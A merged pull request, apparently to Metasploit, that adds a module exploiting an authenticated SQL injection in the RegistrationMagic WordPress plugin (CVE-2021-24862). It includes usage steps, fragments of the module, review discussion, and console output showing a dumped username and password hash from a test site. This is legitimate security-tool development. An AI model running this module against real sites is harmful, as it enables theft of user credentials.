### PR TITLE
Wordpress Plugin RegistrationMagic sqli (CVE-2021-24862)

### PR DESCRIPTION
**Pull request by h00die**
This PR adds an authenticated SQLi against RegistrationMagic plugin for Wordpress (CVE-2021-24862). Very simple to install, no configuration required. Should take no time to test.

## Verification

- [ ] Install the plugin, use defaults
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/scanner/http/wp_registrationmagic_sqli`
- [ ] Do: `set rhosts [ip]`
- [ ] Do: `set username [username]`
- [ ] Do: `set password [password]`
- [ ]  Do: `run`
- [ ] You should get the users and hashes returned.
- [ ] **Document** check to make sure its good

### CODE REVIEW

File: modules/auxiliary/scanner/http/wp_registrationmagic_sqli.rb [hunk 1]
```diff
@@ -0,0 +1,121 @@
...
+      return
+    end
+    print_good('Vulnerable version of RegistrationMagic detected')
+
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+
+    if cookie.nil?
+      vprint_error('Invalid login, check credentials')
+      return
+    end
```
Comment (smcintyre-r7) [inline modules/auxiliary/scanner/http/wp_registrationmagic_sqli.rb:70]: This is kind of important. If the credentials aren't set, the module just exits quietly.

```suggestion
    fail_with(Failure::NoAccess, 'Invalid login, check credentials') if cookie.nil?
      
```

**Review by smcintyre-r7 — COMMENTED** [review]
Just left a couple of minor comments. I tested the module and it's working well on Wordpress 5.9 with plugin version 5.0.1.5.

**Comment by h00die** [comment]
gave it a try, worked out fine

**Comment by smcintyre-r7** [comment]
Working great, I'll get this landed in a moment.

```
msf6 auxiliary(scanner/http/wp_registrationmagic_sqli) > run

[+] Vulnerable version of RegistrationMagic detected
[*] Enumerating Usernames and Password Hashes
[+] Dumped table contents:
wp_users
========

 user_login  user_pass
 ----------  ---------
 smcintyre   $P$B11wrEvmIpmBqOA3D7VsW1crZ/MY0r/

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_registrationmagic_sqli) > 
```

**Comment by smcintyre-r7** [comment]
# Release Notes
This adds an exploit for CVE-2021-24862 which is an authenticated SQL injection vulnerability within the RegistrationMagic Wordpress plugin.

**Pull request merged**